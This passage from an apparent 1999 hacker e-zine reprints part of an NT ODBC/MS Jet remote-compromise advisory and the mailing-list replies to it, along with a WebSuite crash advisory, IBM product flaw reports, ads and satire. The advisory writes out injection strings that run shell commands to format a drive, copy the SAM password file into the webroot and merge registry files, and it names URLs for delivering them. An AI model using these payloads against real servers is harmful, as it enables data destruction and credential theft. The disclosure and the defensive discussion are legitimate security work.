between VBA operators inside the |...| construction.
--[ How about a practical example?
An example of a pipeline:
|shell("cmd /c echo " & chr(124) & " format a:")|
will format whatever is in the floppy drive at the time. Any errors will
be silently ignored, although an iconised window will take the focus for
the duration of the command.
Using "cmd /c" allows the command piping necessary to get a newline into
the format command, otherwise the pipe and 'format' are passed as
arguments to 'echo'.
This string can be included in anything from a simple ODBC operation to a
text item in an ASP form on a web page. The function will normally
evaluate to a two or three digit number.
A more sophie's-stick-ate-it example involves grabbing a copy of the SAM:
|shell("cmd /c rdisk /S-")|
|shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")|
** this example includes assumptions about the location of the
** system and www publishing directory; it's only an example
Commands can be stacked:
|shell("cmd /c echo 1 > %temp%\foo.txt") & shell("cmd /c echo 2 \
>> %temp%\foo.txt") & shell("cmd /c echo 3 >> %temp%\foo.txt")|
** line broken for clarity
It is not clear that the commands will always be executed in order. Each
shell command executes asynchronously so the code above has two races for
whether the shell commands finish updating the file before the next one
starts - results will be variable.
--[ Could an attacker modify registry keys?
Ultimately the hole allows anything since you can up/download and run any
code, but modifying registry keys from VBA seems to be a little tricky.
The method using advapi32.dll won't work because it requires statements to
declare functions from the library, but there doesn't seem to be a way of
giving a statement a return value in VBA.
It would be easier to create a temporary .reg file and then merge it with
"cmd /c regedit /s %temp%\tmp.reg"; the '/s' is important, as it
suppresses the informational dialogs/windows.
--[ What permissions will an attacker have?
The dangerous part comes from a context misinterpretation with IIS. IIS
runs as system_local; it changes its token context (typically to IUSR_xxx)
for filesystem access and application execution. However, the context
does *NOT* change when interfacing with the ODBC API. Therefore all ODBC
functions (and the associated database calls) are happening under
system_local. This allows full access to the system.
--[ Theory of exploitation
This problem can be used over the web against scripts that make queries
against local MS Jet ODBC DSNs, therefore, any script or application that
uses a MS Jet ODBC DSN could potentially be exploited. The solution is to
not use MS Jet ODBC drivers for any DSN--until Microsoft releases a fix.
But since this is a documented feature, there stands a chance that some
applications may break if removed.
--[ Reality of exploitation
Ok, so let's get down to some nitty-gritty, real-life examples. We'll
give a few that just demonstrate the problem....but since any
script/application that gives user entered strings to the MS Jet ODBC DSN
are vulnerable, we're not going to laundry-list them; rather, we'll show
some of the more common cases we found.
--[ Importance of the DSN
Just some really quick background on ODBC & DSNs: an application
'connects' to the ODBC service specifying a specific DSN to query to. The
DSNs are defined in the ODBC32 applet of the control panel. Each DSN is
basically a description of the name of the DSN, the drivers to use (in our
case, the MS Jet/Access drivers), and location of the actual database (a
.mdb file somewhere in the filesystem). We could also have DSNs that used
drivers such as Oracle or MS Sql, and the location would be another
server. The whole point is that you only need to know the DSN name--ODBC
will take care of where and how the actual database is to be used.
So, great, these scripts query a DSN by name. Well, there are times were
a server can have the scripts we mention, but when ran, you get an error
saying DSN is not found. So now what? Well, if it's an IIS server, check
for the existance of /scripts/tools/newdsn.exe. Yes, IIS includes CGI
appliations *to make DSNs*. If the server doesn't have the DSN we need,
we can just make it for them. We only need newdsn.exe, but it's possible
to use a 'GUI' through getdrvrs.exe and dsnform.exe. Here's a flowchart:
http://server/scripts/tools/getdrvrs.exe
-> pick Microsoft Access Driver (*.mdb)
-> Enter in the correct DSN name
-> Enter a location for the .mdb, example: c:\web.mdb
-> Submit
This will create the DSN. If you want to be ultra-elite and do it the
hard way, you can pass all the parameters to newdsn.exe like so:
http://server/scripts/tools/newdsn.exe?driver=Microsoft%2B
Access%2BDriver%2B%28*.mdb%29&dsn=DSN_name&dbq=c:\web.mdb&
newdb=CREATE_DB&attr=
**all one line, no spaces
Where dsn is the name you want, and dbq is the file location. So for all
the examples, we'll include the DSN name, just in case you have to create
it.
--[ IIS Sample Applications
According to Russ Cooper of NTBugtraq, sample application problems are
stupid and we shouldn't waste our time talking about them. He's already
denied posts from myself, David Litchfield, and others. So, if you lived
in Russ's little world, you won't have any of the following sample apps
installed on your server, so you should just stop reading this article
right now. But for those of you who realize it's just not that simple,
perhaps you can learn something here. Also note this goes beyond sample
scripts--they're just being used as a command reference example.
Anyways, a good example script is
http://server/scripts/samples/details.idc?Fname=&Lname=
stick your shellcode in for either Fname or Lname, like so:
details.idc?Fname=hi&Lname=|shell("cmd+/c+dir")|
This uses DSN named "Web SQL" (notice the space). However, this causes
problems, because the actual table must be initialized in the DSN. Never
pheer, scripts are here! Run
http://server/scripts/samples/ctguestb.idc
after you create the DSN (if you had to) and before you run details.idc
--[ MSADC (IIS 4.0)
Starting with IIS 4.0, Microsoft bundled a way to do remote SQL queries on
a DSN simply by interfacting via HTTP to a specific .dll. Bug? Hole?
Nope, in the documentation Microsoft states that having MSADC installed
could lead to security problems.
The particular .dll is at
http://server/msadc/msadcs.dll
Now the particular problem is that there's a slightly custom way to
interface to the .dll, using multipart-forms. So it's beyond the scope of
just typing in a paramter by hand. So there's two options.
One is to see if the server also has the (optional) interface installed.
Check out for the existance of
http://server/msadc/samples/adctest.asp
** Note: you have to use Internet Explorer 4.0+ for this
This will give you a Java/Javascript interface that allows you to specify
the DSN, uid/password, and SQL string to execute. Note that you'll have
to obtain the table structure for the DSNs mentioned herein, because
you'll need to construct a valid SQL statement.
The other option is to obtain those files yourself from another server, or
download and install the MS RDS/ADO/ADC components. Look at
http://www.microsoft.com/data/ado/
for more info and where to download.
** One note is that the Java interface lets you specify which server to
use. So you can open the interface locally, off your own server, or find
it on server 1, and specify to run SQL commands against whatever DSN on
server 2.
The one caveat is that error information is not displayed. It helps to
have a sniffer going to see if what ODBC error messages are returned, if
any. If you don't get a record listing, you might want to see what the
error was.
Now, what to do?
You can obviously just execute SQL commands that contain the pipe
character. For instance:
Connection: DSN=AdvWorks
Query: Select * from Products where ProductType='|shell("")|'
** Insert your shellcode in the shell() function
--[ Sign-Off
Well, I'm sure that's enough to chew for a bit. Sorry, the examples
weren't as in-depth as usual--you'll just have to be satisfied with
theory. :)
Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
.rain.forest.puppy. [WireTrip] rfp@wiretrip.net
.many thanks to Matthew for working on this project together. :>
.greetings to (#!)ADM, (#)Rhino9, and Phrack
.special thanks to joewee & antilove for giving me a hard time; stran9er
.for all the fun chats and setting me straight; and everyone else I forgot
.before these greets become longer than the advisory. :) Oh, and el8.org rox.
--[ This advisory is ISO 31337 certified. Fact of life: ADM > *
----------------------------------------------------------------------------------
Date: Tue, 25 May 1999 22:00:42 +0100
From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
Here's some javascript stuff that'll clean up quotes and things before
having them sent off in a sql query... only tested with access, so YMMV.
function cleanSql (str) {
var newStr = "";
str = "" + str;
var oneChar = (str.length == 1);
if (str.length == 0) { return "null"; }
for (var i = 0; i < str.length; i++) {
var repStr = "";
if (str.charAt(i) == "'") { newStr += "''"; }
else if (str.charAt(i) == "|") { repStr = 124; }
else if (str.charAt(i) == "\"") { repStr = 34; }
else { newStr += str.charAt(i); }
if (repStr) {
if (i == 0 && !oneChar) {
newStr += "CHR(" + repStr + ") &'";
} else if (i == str.length - 1 && !oneChar) {
newStr += "' & CHR(" + repStr + ")";
} else if (!oneChar) {
newStr += "' & CHR(" + repStr + ") & '";
} else {
newStr += "CHR(" + repStr + ")";
}
}
if (!repStr && i == 0) {
newStr = "'" + newStr;
}
if (!repStr && i == str.length - 1) {
newStr += "'";
}
}
return newStr;
}
not elegant, but it does work, and stop |'s getting through.
bye
vittal
--
Vittal Aithal
Revolution Ltd <tel: 0181 267 1000> <fax: 0181 267 1066>
<vittal.aithal@revolutionltd.com> <http://www.revolutionltd.com/>
<vittal.aithal@bigfoot.com> <http://www.bigfoot.com/~vittal.aithal/>
----------------------------------------------------------------------------------
Date: Tue, 25 May 1999 14:43:25 -0700
From: Bigby Findrake <bigby@HOME.SHIVA.EU.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
On Tue, 25 May 1999, Vittal Aithal wrote:
> Here's some javascript stuff that'll clean up quotes and things before
> having them sent off in a sql query... only tested with access, so YMMV.
Do keep in mind that while this will stop people from using the
aforementioned exploits *only when using your forms*. It is still
possible to download your web pages, remove the javascript hooks, and then
submit their information, or call the CGI(if method GET is accepted) by
hand and get around such security measures.
----------------------------------------------------------------------------------
Date: Wed, 26 May 1999 09:01:26 +0100
From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
Just to clarify my earlier posting;
The code I posted was server-side ASP Javascript. As a number of people
have/will point out, running it at the client isn't going to help.
I suspect the same methodology could be applied for other environments
(coldfusion / perl DBI::DBD / php / etc).
cheers
vittal
----------------------------------------------------------------------------------
Date: Wed, 26 May 1999 18:56:05 +0200
From: Bronek Kozicki <bronek@wpi.com.pl>
To: BUGTRAQ@netspace.org
Subject: Re: Advisory: NT ODBC Remote Compromise
Hello
I have run some testing. Seems to me that this error has been repaired in
MSJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and it's
used by ODBC) ther's no problem with .IDC files. If one does not have Jet 4
and is using .IDC to open Jet databases (I have not verified this) I belive
this is dangerous situation, described by Matthew Astley.
Because MS Access 97 is using Jet 3.5 (even if Jet 4 is installed), the
problem still can be seen there.
If instead of .IDC (which is considered obsolete) one is using .ASP + ADODB,
and ADODB provider used is "Microsoft.Jet.OLEDB.3.51" (i.e. older than
"4.0") then problem still exists.
It's worthy to notice that SQL implementation used in both Jet 4 and Jet 3.5
is little different. Thus applications (in some situations) cannot be simple
ported from one to another. One thing I found is different handling of
single- and double-qoute character. MS still have not documented differences
(or I had no luck to find it). AFAIK MS Jet 4 comes with Microsoft Data
Access 2.1 (MSDAC21).
Details:
System: WinNT Wrkst 4 US, SP5 , IE5 , IIS 4 (Option Pack), ODBC MS Access
Driver 4.00.3513.00, other (cursor library, administrator etc.) ODBC files
3.510.3711.0
Database: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.25
installed, but Access 97 uses older version)
Table "guests" as described in Web SQL.
Query "SecurityTest" as bellow:
SELECT FirstName, LastName FROM Guests WHERE LastName =
'|Shell("notepad.exe",1)|';
What happens:
- If I open the query under MS Access, it opens Notepad app and shows the
(empty) resultset. So far mentioned SQL "feature" works.
- If I use MSQRY32.EXE to open the database (), nothing more happen than
showing the resultset (empty one). The same if I run SQRY32 from within MS
Excel ("Get Externala Data")
- I created TEST.IDC file as bellow (and TEST.HTX, of course):
Datasource: Web SQL
Username: sa
Template: details.htx
SQLStatement:
+SELECT FirstName, LastName
+FROM SecurityTest
and opened it through HTTP. The only result is an empty resultset. I checked
list of processes (using TLIST.EXE) and notepad was not run.
- I created TEST2.IDC file as bellow:
Datasource: Web SQL
Username: sa
Template: details.htx
SQLStatement:
+SELECT FirstName, LastName
+FROM Guests
+WHERE LastName <> '|Shell("notepad.exe",1)|'
the same. Notepad did not run.
- I created very simple .ASP
<HTML>
<HEAD>
<%
Param = Request.QueryString("Param")
Data = Request.QueryString("Data")
%>
</HEAD>
<BODY>
<%
Set Conn1 = CreateObject("ADODB.Connection")
'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;Data
Source=c:\temp\test.mdb;Mode=Read"
strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=c:\temp\test.mdb;Mode=Read"
strSQL = "SELECT FirstName , LastName FROM SecurityTest"
Conn1.Open strConn
Set RSet1 = Conn1.Execute(strSQL)
RSet1.Close
Conn1.Close
%>
</BODY>
</HTML>
Notice that there are 2 connection strings, one is used and the other
commented out. Upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51")
is UNSAFE. When I opened .ASP it started NOTEPAD.EXE in the context of WWW
server. If WWW client can type-in any literal into HTML form, pass it to
.ASP application (for exaple to be used in "WHERE" clause) and it remains
non-parsed, then he/she will be able to run ANY code in the context of
LocalSystem. If such a WWW server is also domain controller ... well, I'm
bit scared to think about. Lower connection string
("Provider=Microsoft.Jet.OLEDB.4.0") seems to be safe.
I hope somebody can verify my tests. Most important point is that while .IDC
files are using current ODBC it strongly depends on configuration of the
system. If Jet 4 is installed and is used by ODBC, we are safe. The same
applies to .ASP + ODBC. On the other side is .ASP + ADODB, where Jet engine
can be explicitly selected. If Jet older than 4 is used then we have
dangerous situation. Fortunately in .ASP we can easily parse strings passed
>from WWW client (like Vittal Aithal did in JavaScript, but function will be
run on the server side).
Regards.
Bronek Kozicki
--------------------------------------------------
ICQ UID: 25404796 PGP KeyID: 0x4A30FA9A
07EE 10E6 978C 6B33 5208 094E BD61 9067 4A30 FA9A
: -----Original Message-----
: From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]
: Sent: Tuesday, May 25, 1999 9:00 PM
: To: BUGTRAQ@NETSPACE.ORG
: Subject: Advisory: NT ODBC Remote Compromise
:
:
: --[ Advisory: NT ODBC Remote Compromise
:
: --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
: --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
:
: --[ Brief Summary
:
: MS Jet database engine (which runs Access databases) allows an individual
: to embed VBA in string expressions, which may allow the individual to run
: commandline NT commands. This, combined with the flaw of IIS running ODBC
: commands as system_local allow a remote attacker to have full control of
: the system. Other webservers may be affected. Many MS Jet engines are
: affected, but may not lead to elevated priviledges.
Here's something that does not work for me. ODBC is not using Jet "feature"
run embed VBA expression. It seems to use different database engine.
: --[ Background
:
: ODBC allows a program flexible access to one or more relational databases
: using SQL. If a client fails to quote correctly the meta characters in a
: piece of data used in an SQL query, an attacker may be able to interfere
: with the tables in the database (see MS SQL appension 'feature' in Phrack
: 54, article 8).
That's true, but not connected to the subject. Attacker seems not to use
Jet, while "feature" exists just there. At least on my system.
: However, the Microsoft "Jet" database engine (aka MS Access) provides some
: extensions to SQL which allow the execution of VBA (Visual Basic for
: Applications). This makes holes in meta character quoting code much more
: interesting and dangerous.
That's true.
[cut]
----------------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:48:48 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise
I've had 2 individuals suggest that MDAC 2.1 solves the problems
described by rfp@wiretrip.net regarding NT ODBC and Access. There is
also another message on Bugtraq suggesting the same thing.
Daryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFusion
product is vulnerable to the same attack when using Access datasources,
but appears not to be vulnerable after installing MDAC 2.1.
I could put a direct link here to MDAC 2.1, but the fact is that you
should not simply upgrade to it without understanding what it changes
(and what effect those changes may have on your existing environment).
So instead, I give you;
http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
which has a ton of information about the MDAC 2.1 release.
Cheers,
Russ - NTBugtraq Editor
----------------------------------------------------------------------------------
Date: Thu, 27 May 1999 17:20:45 -0500
From: Jesper M. Johansson <jesper.m.johansson-1@UMN.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Advisory: NT ODBC Remote Compromise
>I could put a direct link here to MDAC 2.1, but the fact is that you
>should not simply upgrade to it without understanding what it changes
>(and what effect those changes may have on your existing environment).
>So instead, I give you;
>
>http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
If you are using Excel data sources and are updating data in them you will
want to keep in mind that upgrading to MDAC 2.1 will break those data
sources. MDAC 2.1 no longer supports the update method for Excel data
sources. This will, for example, cause Cold Fusion to access violate, and
often causes crashes in InetSrv.exe if you are using IIS. Unfortunately, MS
forgot to mention that in the document Russ pointed to.
Jesper
Jesper.M.Johansson-1@umn.edu
Ph.D. Candidate, University of Minnesota
Editor, SANS NT Digest
MCSE , MCP + I
http://ids.csom.umn.edu/jesper
"Juris Praecepta sunt haec: honeste vivere,
alterum non laedere, suum cuique tribuere"
Ulpian
@HWA
53.0 Advisory: Buffer overflow in SmartDesk WebSuite v2.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Advisory: Buffer overflow in SmartDesk WebSuite v2.1
Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99
Description:
-----------
WebSuite v2.1 will crash when an additional 250+ characters
is appended after the sites URL on NT Server 4 and NT
Workstation 4 boxes.
Running on top of Windows 98 it will crash with 150+ characters
appended after the sites URL.
After reinstallating on both platforms several times, the
overflow string length varied. Approximately 1 out of 8 times
the overflow string went from 150 chars (Win98) to about
1000+ chars. It also went from 250+ chars (NT) to about
2000+ chars.
After the server crashes on NT Workstation 4, it's unable
to find the lib file sysclass.flb. (On our tests).
Details:
-------
[Windows NT]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000
SDWEBSRV.EXE crashes.
[Windows 98]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000
SDWEBSRV.EXE crashes.
-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------
@HWA
54.0 Security Leak wit
h IBM Netfinity Remote Control Software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 13:05:56 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Security Leak with IBM Netfinity Remote Control Software
On May 10th, 1999, Thomas Krug reported to NTBugtraq;
>Hi,
>
>I found a method to run programs like regedit and user manager with
>admin right using the above tool. The following testscenario has
>been used:
>
>PC with Windows NT Workstation in a Domain
>Registry has been secured (especially HKLM)
>The User has no local admin rights and is in no admin group.
>The execution of regedit and regedt32 has been forbidden by system
>policy.
>
>When running the Netfinity Client and starting the process manager
>(view, close and execute processes) and run for instance
>regedit.exe or musrmgr.exe the programs run under the user
>configured with the netfinity service, either the system account
>or an admin.
>
>Thomas
After an incredibly difficult journey through the labyrinth of IBM's
support groups, I finally spoke to a Ted McDaniels who, reportedly, was
responsible for support of the IBM Netfinity RCS.
After explaining Tom's issues with the product, Ted acknowledged that
IBM Netfinity RCS was "built with very little security in mind". He also
expressed doubt that any "fix" might be made to it to give it even the
most rudimentary NT security understandings.
IBM did promise to send some sort of explanation to NTBugtraq regarding
Thomas' findings, however, Ted has now gone on vacation and we're left
with nothing from them.
Can you detect how disappointed I am with IBM's reaction and handling of
this issue?
Thomas' company was in the process of ripping out IBM Netfinity RCS when
he originally submitted the issue, and all indications are that anyone
using IBM Netfinity RCS, or considering using it, should do the same.
Bottom line, there is no way to control what a user can or cannot do
with the "Process Manager" component of IBM Netfinity RCS, and clearly
they are able to usurp all other controls you might have placed on your
NT environment should the product be present. The service *must* be run
as either SYSTEM or ADMINISTRATOR.
If anyone has found a way to avoid the *HUGE SECURITY HOLE* this product
creates in an NT environment, please let us know.
Cheers,
Russ - NTBugtraq Editor
@HWA
55.0 IBM eNetwork Firewall for AIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 20:33:53 +0100
From: Paul Cammidge <paul@PCCC.CO.ZA>
To: BUGTRAQ@netspace.org
Subject: IBM eNetwork Firewall for AIX
The IBM eNetwork Firewall for AIX contains some poorly written scripts,
which create temporary files in /tmp without making any attempt to
validate the existance of the file. This allows any user with shell
access to such a firewall to corrupt or possibly modify system files by
creating links, pipes, etc with the same name.
In a simple example submitted to IBM, /etc/passwd was overwritten. This
example has been published on one of their support web pages as a 'local
fix'.
The problem was reported to IBM early in January. To the best of my
knowledge, the correct procedures have been followed. Initially, IBM
responded by telling me that it was common practice for software to make
use of /tmp. They suggested changing the permissions to prevent users
>from creating symbolic links to sensitive files.
An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
fix has not yet been released. This definately applies to version 3.2,
and probably others.
Anyone running this software and has users with shell accounts should be
aware that the potential exists for these users to corrupt files which
they dont have access to.
cheers
paul
--------------------------------------------------------------------------
Date: Sat, 29 May 1999 00:29:25 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: IBM eNetwork Firewall for AIX
Hi Paul,
> The IBM eNetwork Firewall for AIX contains some poorly written scripts,
> which create temporary files in /tmp without making any attempt to
> validate the existance of the file. This allows any user with shell
> access to such a firewall to corrupt or possibly modify system files by
> creating links, pipes, etc with the same name.
your are right, all their scripts have got link vulnerabilities ...
> The problem was reported to IBM early in January. To the best of my
> knowledge, the correct procedures have been followed. Initially, IBM
> responded by telling me that it was common practice for software to make
> use of /tmp. They suggested changing the permissions to prevent users
> from creating symbolic links to sensitive files.
when I found these in an audit at a customer in february, I opened an APAR
too, but then discovered yours. When I saw that yours was opened a month
before mine and not being dealt with, I made noise at IBM management and
the AIX Security Team, that they issued an emergency fix.
But this fix only available for those who know that it exists - anyway, the
quick fix still has /tmp races all over the place - they just added "rm -f
file" the line before writing into it ....
> An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
> fix has not yet been released. This definately applies to version 3.2,
> and probably others.
I heard that the next IBM Firewall version will fix this ... bah - maybe
with that quick "fix" ...
But to set one thing straight: It's *not* IBM's fault. The IBM Firewall is a
product of another company called Raleigh (I hope thats spelled correctly).
In fact, the IBM AIX Security Team, especially Troy Bollinger, was very
helpful and getting a fix - a correct one - out. It's the other company
who writes security software but really seems to have no knowledge.
sad but true
Greets,
Marc
--
Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
E@mail: marc@suse.de Function: Security Support & Auditing
"lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C
@HWA
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
<img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
http:/ 99 http:o
http:/ login: sysadmin n99 httpi
/come. password: tp://comn
to/Can me.to/Cat
c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
http:/ industry people to attend with booths and talks. 99 http:e
/come. you could have a booth and presentation for the cost of p://comel
http:/ little more than a doorprize (tba) contact us at our main n99http:i
http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
http:/ for updates. This is the first Canadian event of its type invalid t
403 Fo and will have both white and black hat attendees, come out logged! !
404 Fi and shake hands with the other side... *g* mainly have some IP locked
ome.to fun and maybe do some networking (both kinds). see ya there! hostname
http:/ x99http:x
o/Canc x.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
<a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
! !
$ $
! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
$ $
! !
$$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
<a href="http://www.2600.com/">www.2600.com</a>
<a href="http://www.kevinmitnick.com></a>
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
<a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! .............
-----------------------------/-----------------------------
http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440
NATO authorizes airstrikes on hackers
Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute
mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for
NATO strikes.
Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any
moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of
Defense website.
"This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer
Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it
now so I can get back to cracking Afterlife II."
Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z
60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of
flamewars over the proper use of the word 'hacker' versus 'cracker' in the page.
Many college-age hackers stayed home rather than attending school, though most admit they would have
stayed home anyway.
Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how
long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow
grain in the field with a plow and oxen.
Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August,
when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of
the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with
triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social
involvement enjoyable.
Despite the danger, supporters of hard-line hackers were defiant.
"NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be
cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their
computers, which will cripple their systems beyond repair."
Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among
the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit
card numbers and eating babies.
"Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites,
and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs,
they are dead wrong."
Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known
pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory.
"We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting
greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God,"
said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla
leader, known only as RMS, claimed responsibility for the killing.
NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after
hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the
whitehouse.gov server.
"In the past, computer security was a war of escalation between system administrators and joy-riding
hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we
brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet
safe for everyone, we must squash dissension once and for all. Countries have been nuked for less."
"If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and
AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as
he sought -- and got -- support from congressional leaders for military action.
"We must halt the hackers and save the Internet for our children and the future of our country. The dirty,
despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information
